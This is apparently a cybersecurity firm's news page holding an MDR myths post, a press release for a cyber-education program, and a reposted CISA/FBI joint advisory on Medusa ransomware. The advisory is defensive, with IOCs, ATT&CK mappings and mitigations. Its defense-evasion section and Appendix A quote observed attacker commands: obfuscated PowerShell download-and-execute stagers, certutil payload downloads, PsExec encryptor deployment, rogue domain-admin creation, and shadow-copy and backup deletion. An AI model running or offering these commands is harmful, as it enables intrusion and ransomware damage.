MDR Cybersecurity Myths Debunked

MDR Cybersecurity Myths Debunked

by | Mar 26, 2025 | News, Blogs

Why MDR is Essential for Cybersecurity Resilience in an Evolving Threat Landscape

Many companies rely on firewalls, antivirus software, and endpoint protection, but these solutions alone are no longer enough. Managed Detection and Response (MDR) bridges the gap by providing 24/7 threat monitoring, proactive detection, and rapid incident response, ensuring businesses can identify, contain, and neutralize threats before they cause significant damage.

In this blog, we’ll explore why MDR is not just an optional security layer but a critical component for enhancing cybersecurity resilience, reducing downtime, and staying ahead of emerging threats.

Managed Detection and Response (MDR) services have become essential in today’s cybersecurity landscape, yet several misconceptions persist. Addressing these myths is crucial for organizations aiming to bolster their security posture effectively.BLOG THUMBNAIL

Myth 1: MDR is Just Another Term for Managed Security Services (MSSP)

Reality: While both MDR and MSSPs offer security services, MDR provides proactive threat hunting, continuous monitoring, and active response to threats, whereas MSSPs typically focus on alert monitoring and basic security management.

 

Myth 2: MDR Services Are Only for Large Enterprises

Reality: MDR services are scalable and beneficial for organizations of all sizes, including small and medium-sized businesses. They provide access to advanced security expertise and technologies without the need for substantial in-house resources.

 

Myth 3: Existing Security Solutions Eliminate the Need for MDR

Reality: Even with robust security tools in place, MDR enhances an organization’s ability to detect and respond to sophisticated threats that traditional solutions might miss, offering a more comprehensive security approach.

 

Myth 4: MDR Only Focuses on Endpoint Security

Reality: Comprehensive MDR services encompass network monitoring, cloud security, and threat intelligence, providing a holistic approach to an organization’s security landscape.

 

Myth 5: Implementing MDR Is Too Expensive and Complex

Reality: Partnering with an MDR provider can be more cost-effective than building and maintaining an in-house 24/7 Security Operations Center (SOC), offering economies of scale and specialized expertise.

 

Myth 6: MDR Adds More Complexity to Existing Security Infrastructure

Reality: A well-integrated MDR service can simplify security operations by centralizing monitoring, response, and management, thereby reducing complexity and enhancing efficiency.

 

Myth 7: Organizations Lose Control Over Security with MDR Providers

Reality: Collaborating with an MDR provider offers enhanced visibility and control over security operations, as they work alongside internal teams to strengthen defenses.

 

Myth 8: MDR Is Solely About Threat Detection

Reality: True MDR encompasses detection, response, threat hunting, and remediation, providing a comprehensive security solution.

 

Myth 9: All MDR Providers Offer the Same Level of Protection

Reality: The quality and comprehensiveness of MDR services vary significantly between providers; it’s essential to assess their capabilities and alignment with organizational needs.

 

Myth 10: More Security Tools Translate to Better Security

Reality: An excess of security tools can lead to tool overload, increasing costs and integration challenges. Effective MDR services streamline security operations, focusing on efficiency and efficacy.

 

Understanding and dispelling these myths enables organizations to make informed decisions about implementing MDR services, ultimately strengthening their cybersecurity posture.

 

PRESS RELEASE: Introducing Cyber EDGE: A Transformational Cyber Education Program to Build the Next Generation of Cyber Defenders

PRESS RELEASE: Introducing Cyber EDGE: A Transformational Cyber Education Program to Build the Next Generation of Cyber Defenders

by | Mar 20, 2025 | News

DOWNLOAD PDF OF THE EIN PRESSWIRE

DALLAS, TX – March 20, 2025 – To address the urgent cybersecurity workforce shortage and enhance national cyber resilience, Coherent Cyber Education, the Cyber Defense Center, and Blackswan Cybersecurity proudly announce the launch of Cyber EDGE – Education, Development, Growth, Employment. This pioneering program is set to redefine cybersecurity workforce development by integrating industry-relevant education, hands-on experience, and direct employment pathways, beginning as early as secondary education.CYBER EDGE LOGO

With over 500,000 unfilled cybersecurity positions in the U.S. and nearly four million globally, the demand for skilled cyber professionals has never been greater. Cyber EDGE is designed to create and sustain high-quality talent pools to meet the increasing threats facing our communities and country daily. The program combines leading-edge technical education and real-world experience through internships, allowing Cyber EDGE students to enter the workforce more prepared than traditional graduates, strengthening U.S. cybersecurity defense more expeditiously.

“Cyber EDGE is more than just an education program; it’s a strategic workforce solution designed to bridge the cybersecurity talent gap,” said Dr. Sari McCoy, CEO of Coherent Cyber Education. “By equipping students with industry-recognized certifications and hands-on experience, we are preparing the next generation of cyber defenders to protect our digital world.”

A Strategic Approach to Workforce Development

Cyber EDGE is structured to deliver comprehensive cybersecurity education through a seamless and sustainable career pathway:

  • Secondary Education Training: Starting in grades 8-12, students engage in an industry-aligned curriculum featuring skill labs, simulated exercises, and the opportunity to earn up to three CompTIA certifications.
  • Internships & Apprenticeships: High school seniors gain real-world experience through mentored internships facilitated by the Cyber Defense Center, developing hands-on expertise in cybersecurity tools and techniques.
  • Post-Graduation Pathways: Graduates can enter the workforce directly, continue higher education, or participate in a U.S. Department of Labor Registered Apprenticeship through Blackswan Cybersecurity and Coherent Cyber Education.

Building a Sustainable Cyber Talent Pipeline

Cyber EDGE is committed to fostering collaboration between education providers, employers, and community stakeholders to ensure program graduates are fully equipped for the evolving cybersecurity landscape. The initiative emphasizes:

  • Industry-relevant curriculum aligned with employer needs.
  • Mentored, real-world experience through internships and apprenticeships.
  • Certification attainment to validate technical expertise.
  • Access to social and economic mobility, ensuring equitable career opportunities.

A National Imperative

Cyberattacks occur every 39 seconds, threatening national security, critical infrastructure, and economic stability. In 2023 alone, cybercrime cost individuals and organizations over $12.5 billion. Cyber EDGE directly addresses this crisis by producing job-ready cybersecurity professionals who can safeguard businesses, government agencies, and military operations against growing cyber threats.

“The cybersecurity threats facing our nation demand a skilled and ready workforce. Blackswan Cybersecurity is proud to support Cyber EDGE’s mission in providing a direct pathway for aspiring cyber professionals to gain real-world experience and enter the market fully prepared to contribute on day one,” said Dr. Mike Saylor, CEO of Blackswan Cybersecurity.

Investing in the Future of Cybersecurity

With a goal to serve 2,000 learners over the next five years, Cyber EDGE aims to expand its reach and impact to meet the growing demand for skilled cybersecurity professionals. This initiative is a critical step toward securing our digital future and strengthening national cyber resilience. “With Cyber EDGE, we are building a pipeline of diverse and qualified cybersecurity talent by giving students access to industry mentors, practical training, and the confidence to thrive in high-stakes cybersecurity roles,” said Kyla Saylor, Program Director at Cyber Defense Center.

Join the Cyber EDGE Movement

We invite schools, employers, policymakers, and investors to join us in this transformative initiative. Together, we can build the cyber workforce of tomorrow and fortify our nation against evolving digital threats.

For more information about Cyber EDGE or partnership opportunities, please contact Dr. Sari McCoy at sari@cyberworkforce.com or Kyla Saylor at ksaylor@uscyberdefensecenter.org, or visit www.coherentcyber.education.

About the Partners

Coherent Cyber Education

Coherent Cyber Education is a leader in cybersecurity workforce development, offering rigorous training programs aligned with industry, government, and military standards. Coherent Cyber Education’s Cybersecurity Career Journey is a strategic initiative aimed at addressing the significant talent shortage in the cybersecurity industry. Recognizing the growing demand for skilled professionals to protect digital, technical, and operational assets from cyber threats, this program offers a comprehensive and structured career pathway from high school to higher education and into the workforce. Coherent Cyber Education builds sustainable defensive cyber workforce pipelines through high-quality and relevant training that exceeds academia, government, military, and industry standards. Coherent Cyber Education is a Department of Labor Registered Apprenticeship Program. Learn more at: www.coherentcyber.education.

 

About Cyber Defense Center

Cyber Defense Center is a 501(c)(3) focused on providing Cybersecurity students with access to Cybersecurity practitioners and real-world experience through supervised projects, presentations, and leadership training aligned with entry-level job requirements in the cybersecurity field.  Since 2012, the Center has trained, mentored and developed over 1200 entry-level ready Cybersecurity resources. Learn more at: www.uscyberdefensecenter.org.

 

About Blackswan Cybersecurity

Blackswan Cybersecurity is a leader in fit-for-purpose cybersecurity solutions. Blackswan helps companies identify the right safeguards for protecting their data assets and outperforming cybersecurity compliance requirements by offering customizable, comprehensive suite of skills, capabilities, and services. These services range from comprehensive 24/7/365 managed security services (SOC-as-a-service), assessment-level gap analysis, vulnerability identification and remediation, incident and breach response, user awareness training, GRC assessments and analysis, and virtual CISO services. Powered by Blackswan’s Fusion Center, Blackswan Cybersecurity provides around-the-clock access to cyber professionals and ‘eyes-on-glass’ threat monitoring, detection, and remediation services from their North Texas-based Cyber Fusion Center (SOC evolved). Blackswan Cybersecurity strives to democratize enterprise-level security services, offering the same level of skills, capabilities, and protection against data breaches for organizations of all sizes. Learn more at: www.blackswan-cybersecurity.com.

###

Media Inquiries:

Dr. Sari McCoy
Coherent CYBER Education
214-813-1532
sari@cyberworkforce.com

Kyla Saylor
Cyber Defense Center
469-431-2486
ksaylor@uscyberdefensecenter.org

CISA Cybersecurity Advisory — #StopRansomware: Medusa Ransomware

CISA Cybersecurity Advisory — #StopRansomware: Medusa Ransomware

by | Mar 19, 2025 | News, Threat Advisories, Blogs

Cybersecurity Advisory

#StopRansomware: Medusa Ransomware

Release Date
CISA_Logo

 

Summary

Note: This joint Cybersecurity Advisory is part of an ongoing #StopRansomware effort to publish advisories for network defenders detailing various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.

The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint advisory to disseminate known Medusa ransomware TTPs and IOCs, identified through FBI investigations as recently as February 2025.

Medusa is a ransomware-as-a-service (RaaS) variant first identified in June 2021. As of February 2025, Medusa developers and affiliates have impacted over 300 victims from a variety of critical infrastructure sectors with affected industries including medical, education, legal, insurance, technology, and manufacturing. The Medusa ransomware variant is unrelated to the MedusaLocker variant and the Medusa mobile malware variant per the FBI’s investigation.

FBI, CISA, and MS-ISAC encourage organizations to implement the recommendations in the Mitigations section of this advisory to reduce the likelihood and impact of Medusa ransomware incidents.

Medusa Ransomware

Download the PDF version of this report:

AA25-071A #StopRansomware: Medusa Ransomware(PDF, 672.45 KB )

For a downloadable list of IOCs, see:

AA25-071A STIX XML(XML, 34.30 KB )
AA25-071A STIX JSON(JSON, 42.28 KB )

Technical Details

Note: This advisory uses the MITRE ATT&CK® Matrix for Enterprise framework, version 16. See the MITRE ATT&CK Tactics and Techniques section of this advisory for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques.

Background

The RaaS Medusa variant has been used to conduct ransomware attacks from 2021 to present. Medusa originally operated as a closed ransomware variant, meaning all development and associated operations were controlled by the same group of cyber threat actors. While Medusa has since progressed to using an affiliate model, important operations such as ransom negotiation are still centrally controlled by the developers. Both Medusa developers and affiliates—referred to as “Medusa actors” in this advisory—employ a double extortion model, where they encrypt victim data and threaten to publicly release exfiltrated data if a ransom is not paid.

Initial Access

Medusa developers typically recruit initial access brokers (IABs) in cybercriminal forums and marketplaces to obtain initial access [TA0001] to potential victims. Potential payments between $100 USD and $1 million USD are offered to these affiliates with the opportunity to work exclusively for Medusa. Medusa IABs (affiliates) are known to make use of common techniques, such as:

Discovery

Medusa actors use living off the land (LOTL) and legitimate tools Advanced IP Scanner and SoftPerfect Network Scanner for initial user, system, and network enumeration. Once a foothold in a victim network is established, commonly scanned ports include:

  • 21 (FTP)
  • 22 (SSH)
  • 23 (Telnet)
  • 80 (HTTP)
  • 115 (SFTP)
  • 443 (HTTPS)
  • 1433 (SQL database)
  • 3050 (Firebird database)
  • 3128 (HTTP web proxy)
  • 3306 (MySQL database)
  • 3389 (RDP)

Medusa actors primarily use PowerShell [T1059.001] and the Windows Command Prompt (cmd.exe) [T1059.003] for network [T1046] and filesystem enumeration [T1083] and to utilize Ingress Tool Transfer capabilities [T1105]. Medusa actors use Windows Management Instrumentation (WMI) [T1047] for querying system information.

Defense Evasion

Medusa actors use LOTL to avoid detection [TA0005]. (See Appendix A for associated shell commands observed during FBI investigations of Medusa victims.) Certutil (certutil.exe) is used to avoid detection when performing file ingress.

Actors have been observed using several different PowerShell detection evasion techniques with increasing complexity, which are provided below. Additionally, Medusa actors attempt to cover their tracks by deleting the PowerShell command line history [T1070.003].

In this example, Medusa actors use a well-known evasion technique that executes a base64 encrypted command [T1027.013] using specific execution settings.

  • powershell -exec bypass -enc <base64 encrypted command string>

In another example, the DownloadFile string is obfuscated by slicing it into pieces and referencing it via a variable [T1027].

  • powershell -nop -c $x = 'D' + 'Own' + 'LOa' + 'DfI' + 'le'; Invoke-Expression (New-Object Net.WebClient).$x.Invoke(http://<ip>/<RAS tool>.msi)

In the final example, the payload is an obfuscated base64 string read into memory, decompressed from gzip, and used to create a scriptblock. The base64 payload is split using empty strings and concatenation, and uses a format operator (-f) followed by three arguments to specify character replacements in the base64 payload.

  • powershell -nop -w hidden -noni -ep bypass &([scriptblock]::create((
  • New-Object System.IO.StreamReader(
  • New-Object System.IO.Compression.GzipStream((
  • New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(
  • (('<base64 payload string>')-f'<character replacement 0>','<character replacement 1>', '<character replacement 2>')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))

The obfuscated base64 PowerShell payload is identical to powerfun.ps1, a publicly available stager script that can create either a reverse or bind shell over TLS to load additional modules. In the bind shell, the script awaits a connection on local port 443 [T1071.001], and initiates a connection to a remote port 443 in the reverse shell.

In some instances, Medusa actors attempted to use vulnerable or signed drivers to kill or delete endpoint detection and response (EDR) tools [T1562.001].

FBI has observed Medusa actors using the following tools to support command and control (C2) and evade detection:

  • Ligolo.
    • A reverse tunneling tool often used to create secure connections between a compromised host and threat actor’s machine.
  • Cloudflared.
    • Formerly known as ArgoTunnel.
    • Used to securely expose applications, services, or servers to the internet via Cloudflare Tunnel without exposing them directly.

Lateral Movement and Execution

Medusa actors use a variety of legitimate remote access software [T1219]; they may tailor their choice based on any remote access tools already present in the victim environment as a means of evading detection. Investigations identified Medusa actors using remote access software AnyDesk, Atera, ConnectWise, eHorus, N-able, PDQ Deploy, PDQ Inventory, SimpleHelp, and Splashtop. Medusa uses these tools—in combination with Remote Desktop Protocol (RDP) [T1021.001] and PsExec [T1569.002]—to move laterally [TA0008] through the network and identify files for exfiltration [TA0010] and encryption [T1486]. When provided with valid username and password credentials, Medusa actors use PsExec to:

  • Copy (-c) one script from various batch scripts on the current machine to the remote machine and execute it with SYSTEM level privileges (-s).
  • Execute an already existing local file on a remote machine with SYSTEM level privileges.
  • Execute remote shell commands using cmd /c.

One of the batch scripts executed by PsExec is openrdp.bat, which first creates a new firewall rule to allow inbound TCP traffic on port 3389:

  • netsh advfirewall firewall add rule name="rdp" dir=in protocol=tcp localport=3389 action=allow

Then, a rule to allow remote WMI connections is created:

  • netsh advfirewall firewall set rule group="windows management instrumentation (wmi)" new enable=yes

Finally, the registry is modified to allow Remote Desktop connections:

  • reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Mimikatz has also been observed in use for Local Security Authority Subsystem Service (LSASS) dumping [T1003.001] to harvest credentials [TA0006] and aid lateral movement.

Exfiltration and Encryption

Medusa actors install and use Rclone to facilitate exfiltration of data to the Medusa C2 servers [T1567.002] used by actors and affiliates. The actors use Sysinternals PsExec, PDQ Deploy, or BigFix [T1072] to deploy the encryptor, gaze.exe, on files across the network—with the actors disabling Windows Defender and other antivirus services on specific targets. Encrypted files have a .medusa file extension. The process gaze.exe terminates all services [T1489] related to backups, security, databases, communication, file sharing and websites, then deletes shadow copies [T1490] and encrypts files with AES-256 before dropping the ransom note. The actors then manually turn off [T1529] and encrypt virtual machines and delete their previously installed tools [T1070].

Extortion

Medusa RaaS employs a double extortion model, where victims must pay [T1657] to decrypt files and prevent further release. The ransom note demands victims make contact within 48 hours via either a Tor browser based live chat, or via Tox, an end-to-end encrypted instant-messaging platform. If the victim does not respond to the ransom note, Medusa actors will reach out to them directly by phone or email. Medusa operates a .onion data leak site, divulging victims alongside countdowns to the release of information. Ransom demands are posted on the site, with direct hyperlinks to Medusa affiliated cryptocurrency wallets. At this stage, Medusa concurrently advertises sale of the data to interested parties before the countdown timer ends. Victims can additionally pay $10,000 USD in cryptocurrency to add a day to the countdown timer.

FBI investigations identified that after paying the ransom, one victim was contacted by a separate Medusa actor who claimed the negotiator had stolen the ransom amount already paid and requested half of the payment be made again to provide the “true decryptor”— potentially indicating a triple extortion scheme.

Indicators of Compromise

Table 1 lists the hashes of malicious files obtained during investigations.

Table 1: Malicious Files
Files Hash (MD5) Description
!!!READ_ME_MEDUSA!!!.txt Redacted Ransom note file
openrdp.bat 44370f5c977e415981febf7dbb87a85c Allows incoming RDP and remote WMI connections
pu.exe 80d852cd199ac923205b61658a9ec5bc Reverse shell

 

Table 2 includes email addresses used by Medusa actors to extort victims; they are exclusively used for ransom negotiation and contacting victims following compromise. These email addresses are not associated with phishing activity conducted by Medusa actors.

Table 2: Medusa Email Addresses
Email Addresses Description
key.medusa.serviceteam@protonmail.com Used for ransom negotiation
medusa.support@onionmail.org Used for ransom negotiation
mds.svt.breach@protonmail.com Used for ransom negotiation
mds.svt.mir2@protonmail.com Used for ransom negotiation
MedusaSupport@cock.li Used for ransom negotiation

MITRE ATT&CK Tactics and Techniques

See Table 3 – Table 11 for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.

Table 3: Initial Access
Technique Title ID Use
Exploit Public-Facing Application T1190 Medusa actors exploited unpatched software or n-day vulnerabilities through common vulnerabilities and exposures.
Initial Access TA0001 Medusa actors recruited initial access brokers (IABS) in cybercriminal forums and marketplaces to obtain initial access.
Phishing T1566 Medusa IABS used phishing campaigns as a primary method for delivering ransomware to victims.

 

Table 4: Defense Evasion
Technique Title ID Use
Indicator Removal: Clear Command History T1070.003 Medusa actors attempt to cover their tracks by deleting the PowerShell command line history.
Obfuscated Files or Information: Encrypted/Encoded File T1027.013 Medusa actors use a well-known evasion technique that executes a base64 encrypted command.
Obfuscated Files or Information T1027 Medusa actors obfuscated a string by slicing it into pieces and referencing it via a variable.
Indicator Removal T1070 Medusa actors deleted their previous work and tools installed. 
Impair Defenses: Disable or Modify Tools T1562.001 Medusa actors killed or deleted endpoint detection and response tools.

 

Table 5: Discovery
Technique Title ID Use
Network Service Discovery T1046 Medusa actors utilized living of the land techniques to perform network enumeration.
File and Directory Discovery T1083 Medusa actors utilized Windows Command Prompt for filesystem enumeration.
Network Share Discovery T1135 Medusa actors queried shared drives on the local system to gather sources of information.
System Network Configuration Discovery T1016 Medusa actors used operating system administrative utilities to gather network information.
System Information Discovery T1082 Medusa actors used the command systeminfo to gather detailed system information.
Permission Groups Discovery: Domain Groups T1069.002 Medusa actors attempt to find domain-level group and permission settings.

 

Table 6: Credential Access
Technique Title ID Use
Credential Access TA0006 Medusa actors harvest credentials with tools like Mimikatz to gain access to systems.
OS Credential Dumping: LSASS Memory T1003.001 Medusa actors were observed accessing credential material stored in process memory or Local Security Authority Subsystem Service (LSASS) using Mimkatz.

 

Table 7: Lateral Movement and Execution
Technique Title ID Use
Lateral Movement TA0008 Medusa actors performed techniques to move laterally without detection once they gained initial access.
Command and Scripting Interpreter: PowerShell T1059.001 Medusa actors used PowerShell, a powerful interactive command-line interface and scripting environment for ingress, network, and filesystem enumeration.
Command and Scripting Interpreter: Windows Command Shell T1059.003 Medusa actors used Windows Command Prompt—which can be used to control almost any aspect of a system—for ingress, network, and filesystem enumeration. 
Software Deployment Tools T1072 Medusa Actors used PDQ Deploy and BigFix to deploy the encryptor on files across the network.
Remote Services: Remote Desktop Protocol T1021.001 Medusa actors used Remote Desktop Protocol (RDP), a common feature in operating systems, to log into an interactive session with a system and move laterally.
System Services T1569.002 Medusa actors used Sysinternals PsExec to deploy the encryptor on files across the network.
Windows Management Instrumentation T1047 Medusa actors abused Windows Management Instrumentation to query system information.

 

Table 8: Exfiltration and Encryption
Technique Title ID Use
Exfiltration TA0010 Medusa actors identified files to exfiltrate out of victim networks.
Exfiltration Over Web Service: Exfiltration to Cloud Storage T1567.002 Medusa actors used Rclone to facilitate exfiltration of data to the Medusa C2 servers.

 

Table 9: Command and Control
Technique Title ID Use
Ingress Tool Transfer T1105 Medusa actors used PowerShell, Windows Command Prompt, and certutil for file ingress.
Application Layer Protocol: Web Protocols  T1071.001 Medusa actors communicate using application layer protocols associated with web traffic. In this case, Medusa actors used scripts that created reverse or bind shells over port 443: HTTPS.
Remote Access Software T1219 Medusa actors used remote access software to move laterally through the network.

 

Table 10: Persistence
Technique Title ID Use
Create Account T1136.002 Medusa actors created a domain account to maintain access to victim systems.

 

Table 11: Impact
Technique Title ID Use
Data Encrypted for Impact T1486 Medusa identified and encrypted data on target systems to interrupt availability to system and network resources.
Inhibit System Recovery T1490 The process gaze.exe terminates all services then deletes shadow copies and encrypts files with AES-256 before dropping the ransom note.
Financial Theft T1657 Victims must pay to decrypt files and prevent further release by Medusa actors.
System Shutdown/Reboot T1529 Medusa actors manually turned off and encrypted virtual machines.
Service Stop T1489 The process gaze.exe terminates all services related to backups, security, databases, communication, file sharing, and websites,

Mitigations

FBI, CISA, and MS-ISAC recommend organizations implement the mitigations below to improve cybersecurity posture based on threat actors’ activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s CPGs webpage for more information on the CPGs, including additional recommended baseline protections.

  • Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (e.g., hard drive, storage device, the cloud) [CPG 2.F2.R2.S].
  • Require all accounts with password logins (e.g., service accounts, admin accounts, and domain admin accounts) to comply with NIST’s standards. In particular, require employees to use long passwords and consider not requiring frequently recurring password changes, as these can weaken security [CPG 2.C].
  • Require multifactor authentication for all services to the extent possible, particularly for webmail, virtual private networks, and accounts that access critical systems [CPG 2.H].
  • Keep all operating systems, software, and firmware up to date. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. Prioritize patching known exploited vulnerabilities in internet-facing systems [CPG 1.E].
  • Segment networks to prevent the spread of ransomware. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between—and access to—various subnetworks and by restricting adversary lateral movement [CPG 2.F].
  • Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool. To aid in detecting the ransomware, implement a tool that logs and reports all network traffic, including lateral movement activity on a network. Endpoint detection and response (EDR) tools are particularly useful for detecting lateral connections as they have insight into common and uncommon network connections for each host [CPG 3.A].
  • Require VPNs or Jump Hosts for remote access.
  • Monitor for unauthorized scanning and access attempts.
  • Filter network traffic by preventing unknown or untrusted origins from accessing remote services on internal systems. This prevents threat actors from directly connecting to remote access services that they have established for persistence.
  • Audit user accounts with administrative privileges and configure access controls according to the principle of least privilege [CPG 2.E].
  • Review domain controllers, servers, workstations, and active directories for new and/or unrecognized accounts [CPG 1.A2.O].
  • Disable command-line and scripting activities and permissions. Privilege escalation and lateral movement often depend on software utilities running from the command line. If threat actors are not able to run these tools, they will have difficulty escalating privileges and/or moving laterally [CPG 2.E2.N].
  • Disable unused ports[CPG 2.V].
  • Maintain offline backups of data, and regularly maintain backup and restoration [CPG 2.R]. By instituting this practice, the organization helps ensure they will not be severely interrupted and/or only have irretrievable data.
  • Ensure all backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire organization’s data infrastructure [CPG 2.K2.L2.R].

Validate Security Controls

In addition to applying mitigations, the FBI, CISA, and MS-ISAC recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK Matrix for Enterprise framework in this advisory. The FBI, CISA, and MS-ISAC recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.

To get started:

  1. Select an ATT&CK technique described in this advisory (Table 3 to Table 11).
  2. Align your security technologies against the technique.
  3. Test your technologies against the technique.
  4. Analyze your detection and prevention technologies’ performance.
  5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
  6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.

The FBI, CISA, and MS-ISAC recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

Reporting

Your organization has no obligation to respond or provide information back to FBI in response to this joint advisory. If, after reviewing the information provided, your organization decides to provide information to FBI, reporting must be consistent with applicable state and federal laws.

FBI is interested in any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with threat actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file.

Additional details of interest include a targeted company point of contact, status and scope of infection, estimated loss, operational impact, transaction IDs, date of infection, date detected, initial attack vector, and host- and network-based indicators.

The FBI, CISA, and MS-ISAC do not encourage paying ransoms as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, FBI, CISA, and MS-ISAC urge you to promptly report ransomware incidents to FBI’s Internet Crime Complaint Center (IC3), a local FBI Field Office, or CISA via the agency’s Incident Reporting System or its 24/7 Operations Center (report@cisa.gov) or by calling 1-844-Say-CISA (1-844-729-2472).

Acknowledgements

ConnectWise contributed to this advisory.

Version History

March 12, 2025: Initial version.

Appendix A: Medusa Commands

These commands explicitly demonstrate the methods used by Medusa threat actors once they obtain a foothold inside a victim network. Incident responders and threat hunters can use this information to detect malicious activity. System administrators can use this information to design allowlist/denylist policies or other protective mechanisms.

cmd.exe /c certutil -f urlcache https://<domain>/<remotefile>.css <localfile>.dll
cmd.exe /c certutil -f urlcache https://<domain>/<remotefile>.msi <localfile>.msi
cmd.exe /c driverquery
cmd.exe /c echo Computer: %COMPUTERNAME% & `
echo Username: %USERNAME% & `
echo Domain: %USERDOMAIN% & `
echo Logon Server: %LOGONSERVER% & `
echo DNS Domain: %USERDNSDOMAIN% & `
echo User Profile: %USERPROFILE% & echo `
System Root: %SYSTEMROOT%
cmd.exe /c ipconfig /all [T1016]
cmd.exe /c net share [T1135]
cmd.exe /c net use
cmd.exe /c netstat -a
cmd.exe /c sc query
cmd.exe /c schtasks
cmd.exe /c systeminfo [T1082]
cmd.exe /c ver
cmd.exe /c wmic printer get caption,name,deviceid,drivername,portname
cmd.exe /c wmic printjob
mmc.exe compmgmt.msc /computer:{hostname/ip}
mstsc.exe /v:{hostname/ip}
mstsc.exe /v:{hostname/ip} /u:{user} /p:{pass}
powershell -exec bypass -enc <base64 encrypted command string>
powershell -nop -c $x = ‘D’ + ‘Own’ + ‘LOa’ + ‘DfI’ + ‘le’; Invoke-Expression (New-Object Net.WebClient).$x.Invoke(http://<ip>/<RMM tool>.msi)
powershell -nop -w hidden -noni -ep bypass &([scriptblock]::create((

New-Object System.IO.StreamReader(

New-Object System.IO.Compression.GzipStream((

New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(

((‘<base64 payload string>’)-f'<character replacement 0>’,

‘<character replacement 1>’,'<character replacement 2>’)))),

[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))
powershell Remove-Item (Get-PSReadlineOption).HistorySavePath
powershell Get-ADComputer -Filter * -Property * | Select-Object Name,OperatingSystem,OperatingSystemVersion,Description,LastLogonDate,

logonCount,whenChanged,whenCreated,ipv4Address | Export-CSV -Path <file path>

-NoTypeInformation -Encoding UTF8
psexec.exe -accepteula -nobanner -s \\{hostname/ip} “c:\windows\system32\taskkill.exe” /f /im WRSA.exe
psexec.exe -accepteula -nobanner -s \\{hostname/ip} -c coba.bat
psexec.exe -accepteula -nobanner -s \\{hostname/ip} -c openrdp.bat
psexec.exe -accepteula -nobanner -s \\{hostname/ip} -c StopAllProcess.bat
psexec.exe -accepteula -nobanner -s \\{hostname/ip} -c zam.bat
psexec.exe -accepteula -nobanner -s \\{hostname/ip} c:\temp\x.bat
psexec.exe -accepteula -nobanner -s \\{hostname/ip} cmd
psexec.exe -accepteula -nobanner -s \\{hostname/ip} cmd /c   “c:\gaze.exe”
psexec.exe -accepteula -nobanner -s \\{hostname/ip} cmd /c  “copy \\ad02\sysvol\gaze.exe c:\gaze.exe
psexec.exe -accepteula -nobanner -s \\{hostname/ip} cmd /c  “copy \\ad02\sysvol\gaze.exe c:\gaze.exe && c:\gaze.exe”
psexec.exe -accepteula -nobanner -s \\{hostname/ip} -u {user} -p {pass} -c coba.bat
psexec.exe -accepteula -nobanner -s \\{hostname/ip} -u {user} -p {pass} -c hostname/ipwho.bat
psexec.exe -accepteula -nobanner -s \\{hostname/ip} -u {user} -p {pass} -c openrdp.bat
psexec.exe -accepteula -nobanner -s \\{hostname/ip} -u {user} -p {pass} -c zam.bat
psexec.exe -accepteula -nobanner -s \\{hostname/ip} -u {user} -p {pass} cmd
psexec.exe -accepteula -nobanner -s \\{hostname/ip} -u {user} -p {pass} -с newuser.bat
psexec.exe -accepteula -nobanner -s \\{hostname/ip} -с duooff.bat
psexec.exe -accepteula -nobanner -s \\{hostname/ip} -с hostname/ipwho.bat
psexec.exe -accepteula -nobanner -s \\{hostname/ip} -с newuser.bat
psexec.exe -accepteula -nobanner -s \\{hostname/ip} -с removesophos.bat
psexec.exe -accepteula -nobanner -s \\{hostname/ip} -с start.bat
psexec.exe -accepteula -nobanner -s \\{hostname/ip} -с uninstallSophos.bat
nltest /dclist:
net group “domain admins” /domain [T1069.002]
net group “Domain Admins” default /add /domain
net group “Enterprise Admins” default /add /domain
net group “Remote Desktop Users” default /add /domain
net group “Group Policy Creator Owners” default /add /domain
net group “Schema Admins” default /add /domain
net group “domain users” /domain
net user default /active:yes /domain
net user /add default <password> /domain [T1136.002]
query user
reg add HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 0
systeminfo
vssadmin.exe Delete Shadows /all /quiet
vssadmin.exe resize shadowstorage /for=%s /on=%s /maxsize=unbounded
del /s /f /q %s*.VHD %s*.bac %s*.bak %s*.wbcat %s*.bkf %sBac kup*.* %sbackup*.* %s*.set %s*.win %s*.dsk
netsh advfirewall firewall add rule name=”rdp” dir=in protocol=tcp localport=3389 action=allow
